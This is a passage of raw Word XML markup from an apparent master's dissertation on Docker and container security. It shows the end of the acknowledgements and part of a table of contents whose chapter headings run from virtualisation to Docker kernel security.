      <w:r w:rsidR="00B043D3" w:rsidRPr="00102C63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Carlene Campbell</w:t>
      </w:r>
      <w:r w:rsidR="00B043D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00882304">
        <w:t>for her invaluable supervision</w:t>
      </w:r>
      <w:r w:rsidR="002042C9">
        <w:t>, advice</w:t>
      </w:r>
      <w:r w:rsidR="003B53A7">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="007A4915">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002042C9">
        <w:t>and support</w:t>
      </w:r>
      <w:r w:rsidR="000B31BE">
        <w:t xml:space="preserve"> throughout </w:t>
      </w:r>
      <w:r w:rsidR="00203EB0">
        <w:t xml:space="preserve">the course of my </w:t>
      </w:r>
      <w:r w:rsidR="00090AB0">
        <w:t>master’s</w:t>
      </w:r>
      <w:r w:rsidR="00203EB0">
        <w:t xml:space="preserve"> degree.</w:t>
      </w:r>
      <w:r w:rsidR="002042C9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB6330">
        <w:t>I would also</w:t>
      </w:r>
      <w:r w:rsidR="00B4513E">
        <w:t xml:space="preserve"> like to express gratitude to</w:t>
      </w:r>
      <w:r w:rsidR="00BB6330">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D6073B" w:rsidRPr="00CD1FD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dr Nitheesh </w:t>
      </w:r>
      <w:r w:rsidR="00C9730E" w:rsidRPr="00CD1FD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kaliya</w:t>
      </w:r>
      <w:r w:rsidR="00CD1FD3" w:rsidRPr="00CD1FD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>murthy</w:t>
      </w:r>
      <w:r w:rsidR="00CF767A">
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidR="00777946">
        <w:t>his mentorship and support.</w:t>
      </w:r>
      <w:r w:rsidR="00270696">
        <w:t xml:space="preserve"> Finally, I would like to thank my families and friends </w:t>
      </w:r>
      <w:r w:rsidR="00BD7B64">
        <w:t>for their encouragement</w:t>
      </w:r>
      <w:r w:rsidR="00A62548">
        <w:t xml:space="preserve"> and support </w:t>
      </w:r>
      <w:r w:rsidR="001D7E2F">
        <w:t>all through my studies.</w:t>
      </w:r>
      <w:r w:rsidR="00A62548">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD7B64">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:id w:val="-927350733"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="43CDEAB8" w14:textId="36FF46CE" w:rsidR="00876746" w:rsidRPr="000E02C7" w:rsidRDefault="008E4209" w:rsidP="00900794">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000E02C7">
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:t>TABLE OF CONTENTS</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="20EE3C7C" w14:textId="01A7FC01" w:rsidR="00551777" w:rsidRPr="000E02C7" w:rsidRDefault="00876746">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000E02C7">
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="000E02C7">
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="000E02C7">
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc87032880" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>ABSTRACT</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_Toc87032880 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>iii</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E93156B" w14:textId="5D1F7638" w:rsidR="00551777" w:rsidRPr="000E02C7" w:rsidRDefault="00E6142E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc87032881" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>ACKNOWLEDGEMENTS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_Toc87032881 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>iv</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BA9A8CD" w14:textId="53A94010" w:rsidR="00551777" w:rsidRPr="000E02C7" w:rsidRDefault="00E6142E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc87032882" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 1</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> - INTRODUCTION</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_Toc87032882 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56BD8EEC" w14:textId="5CAD0C0A"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883" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1 AIM</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_Toc87032883 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4120D464" w14:textId="3D1B232D"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884" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2 OBJECTIVES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_Toc87032884 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2380E64F" w14:textId="32E691AA"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885" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3 STRUCTURE OF THE PROJECT</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_Toc87032885 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23102058" w14:textId="3CE06F72" w:rsidR="00551777" w:rsidRPr="000E02C7" w:rsidRDefault="00E6142E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc87032886" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 2</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> – BACKGROUND RESEARCH</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_Toc87032886 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3CB599EC" w14:textId="1C8111E3"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887" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>OVERVIEW</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_Toc87032887 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1DDED74A" w14:textId="6BF66409"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889" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 VIRTUALISATION VS CONTAINERISATION</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_Toc87032889 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08F60296" w14:textId="2EE42A95"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890" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 DOCKER</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_Toc87032890 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60CDD9A8" w14:textId="26361C9D"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891" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3 DOCKER ARCHITECTURE AND COMPONENTS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_Toc87032891 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5423DF77" w14:textId="35DA6CD8"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892" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.1</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Docker Architecture</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_Toc87032892 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F40C579" w14:textId="12D6553C"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893" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.2</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Docker Images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_Toc87032893 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72E4ACB6" w14:textId="4D32766A"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894" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.3</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Containers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_Toc87032894 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49C2C8C3" w14:textId="2BE2D329"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895" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.4</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Registries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_Toc87032895 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="509CCA6A" w14:textId="2D1038F5"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896" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4 DOCKER AND KERNEL SECURITY</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_Toc87032896 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
